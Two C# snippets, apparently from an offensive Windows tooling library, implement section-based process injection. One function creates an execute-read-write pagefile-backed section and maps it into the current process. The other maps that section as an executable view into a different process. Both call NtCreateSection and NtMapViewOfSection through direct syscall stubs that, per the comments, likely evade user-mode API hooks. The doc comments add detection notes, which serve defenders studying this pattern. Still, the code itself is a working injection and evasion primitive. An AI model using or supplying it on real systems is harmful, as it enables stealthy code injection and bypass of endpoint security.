示例#1
        /// <summary>
        /// Maps a view of an existing section object into the process identified by
        /// <paramref name="hProc"/> and reports the base address of that view.
        /// </summary>
        /// <param name="hProc">Handle passed as the process argument of the NtMapViewOfSection call.</param>
        /// <param name="hSection">Handle of the section object to map.</param>
        /// <param name="ScSize">Requested view size; passed by reference, so the callee may adjust the local copy.</param>
        /// <returns>
        /// A SECT_DATA whose <c>isvalid</c> is true and whose <c>pBase</c> holds the view base when the
        /// call returns status 0 with a non-null base; otherwise <c>isvalid</c> is false.
        /// </returns>
        /// <remarks>
        /// The argument order is assumed to mirror the native NtMapViewOfSection prototype (the delegate
        /// type is declared elsewhere - confirm). Under that assumption 0x2 is the ViewUnmap inherit
        /// disposition and 0x20 is PAGE_EXECUTE_READ, i.e. the view is executable in the other process.
        /// Review/detection note: an executable view of a shared section mapped into a different process
        /// is the pattern commonly associated with section-based process injection. The function pointer
        /// comes from Generic.GetSyscallStub rather than a normal import; presumably this invokes the
        /// system call without going through the exported ntdll routine, in which case user-mode API
        /// hooks would not observe it and kernel-sourced telemetry is the place to look.
        /// Only status 0 is accepted as success; other non-error NTSTATUS values are reported as failure.
        /// </remarks>
        public static SECT_DATA MapRemoteSection(IntPtr hProc, IntPtr hSection, long ScSize)
        {
            // Assumed meanings of the numeric arguments (see remarks).
            const int InheritViewUnmap = 0x2;
            const int ProtectExecuteRead = 0x20;

            SECT_DATA result = new SECT_DATA();

            IntPtr viewBase = IntPtr.Zero;   // zero on input: no base address is requested by this code
            long sectionOffset = 0;
            long viewSize = ScSize;

            // Resolve the stub and wrap it in a managed delegate so it can be invoked.
            IntPtr stubAddress = Generic.GetSyscallStub("NtMapViewOfSection");
            NtMapViewOfSection mapView = (NtMapViewOfSection)Marshal.GetDelegateForFunctionPointer(stubAddress, typeof(NtMapViewOfSection));

            UInt32 status = mapView(hSection, hProc, ref viewBase, IntPtr.Zero, IntPtr.Zero, ref sectionOffset, ref viewSize, InheritViewUnmap, 0, ProtectExecuteRead);

            // Guard clause: anything other than status 0 with a non-null base is a failure.
            if (status != 0 || viewBase == IntPtr.Zero)
            {
                Console.WriteLine("[!] Failed to map section in remote process..");
                result.isvalid = false;
                return result;
            }

            Console.WriteLine("    |-> pRemoteBase: 0x" + viewBase.ToInt64().ToString("X"));
            result.pBase = viewBase;
            result.isvalid = true;
            return result;
        }
示例#2
        /// <summary>
        /// Creates a section object of <paramref name="ScSize"/> bytes and maps a view of it into the
        /// current process.
        /// </summary>
        /// <param name="ScSize">Requested section size; the same local copy is reused as the view size.</param>
        /// <returns>
        /// A SECT_DATA with <c>hSection</c> and <c>pBase</c> populated and <c>isvalid</c> true when both
        /// calls return status 0; otherwise <c>isvalid</c> is false.
        /// </returns>
        /// <remarks>
        /// Argument positions are assumed to follow the native NtCreateSection / NtMapViewOfSection
        /// prototypes (the delegate types are declared elsewhere - confirm). Under that assumption:
        /// 0xe = SECTION_MAP_WRITE | SECTION_MAP_READ | SECTION_MAP_EXECUTE, 0x40 = PAGE_EXECUTE_READWRITE,
        /// 0x8000000 = SEC_COMMIT, and the null file handle makes the section pagefile-backed; the local
        /// view is then mapped with 0x4 = PAGE_READWRITE and inherit disposition 0x2 = ViewUnmap.
        /// Review/detection note: a pagefile-backed section created with read/write/execute protection is
        /// unusual for ordinary applications and is worth alerting on, especially when a second view of
        /// the same section later appears in another process. Both function pointers come from
        /// Generic.GetSyscallStub; presumably the calls do not pass through the exported ntdll routines,
        /// so user-mode hooks may not see them.
        /// Resource note: if the mapping step fails, the section handle is left open and remains in
        /// <c>hSection</c> of the returned value; this method never closes it.
        /// </remarks>
        public static SECT_DATA MapLocalSection(long ScSize)
        {
            // Assumed meanings of the numeric arguments (see remarks).
            const int SectionAccessMapRwx = 0xe;
            const int SectionProtectRwx = 0x40;
            const int AllocationSecCommit = 0x8000000;
            const int InheritViewUnmap = 0x2;
            const int ViewProtectReadWrite = 0x4;

            SECT_DATA result = new SECT_DATA();

            long sectionSize = ScSize;
            IntPtr sectionHandle = IntPtr.Zero;

            // Step 1: create the section object.
            IntPtr stubAddress = Generic.GetSyscallStub("NtCreateSection");
            NtCreateSection createSection = (NtCreateSection)Marshal.GetDelegateForFunctionPointer(stubAddress, typeof(NtCreateSection));
            UInt32 status = createSection(ref sectionHandle, SectionAccessMapRwx, IntPtr.Zero, ref sectionSize, SectionProtectRwx, AllocationSecCommit, IntPtr.Zero);

            if (status != 0 || sectionHandle == IntPtr.Zero)
            {
                Console.WriteLine("[!] Failed to create section..");
                result.isvalid = false;
                return result;
            }

            Console.WriteLine("    |-> hSection: 0x" + sectionHandle.ToInt64().ToString("X"));
            Console.WriteLine("    |-> Size: " + ScSize);
            result.hSection = sectionHandle;

            // Step 2: map a view of that section into this process.
            IntPtr viewBase = IntPtr.Zero;
            long sectionOffset = 0;

            stubAddress = Generic.GetSyscallStub("NtMapViewOfSection");
            NtMapViewOfSection mapView = (NtMapViewOfSection)Marshal.GetDelegateForFunctionPointer(stubAddress, typeof(NtMapViewOfSection));

            // (IntPtr)(-1) is the pseudo-handle that refers to the current process.
            // sectionSize is passed by reference again, carrying whatever value the create call left in it.
            status = mapView(sectionHandle, (IntPtr)(-1), ref viewBase, IntPtr.Zero, IntPtr.Zero, ref sectionOffset, ref sectionSize, InheritViewUnmap, 0, ViewProtectReadWrite);

            if (status != 0 || viewBase == IntPtr.Zero)
            {
                // The section handle stays open and is still present in result.hSection.
                Console.WriteLine("[!] Failed to map section locally..");
                result.isvalid = false;
                return result;
            }

            Console.WriteLine("    |-> pBase: 0x" + viewBase.ToInt64().ToString("X"));
            result.pBase = viewBase;
            result.isvalid = true;
            return result;
        }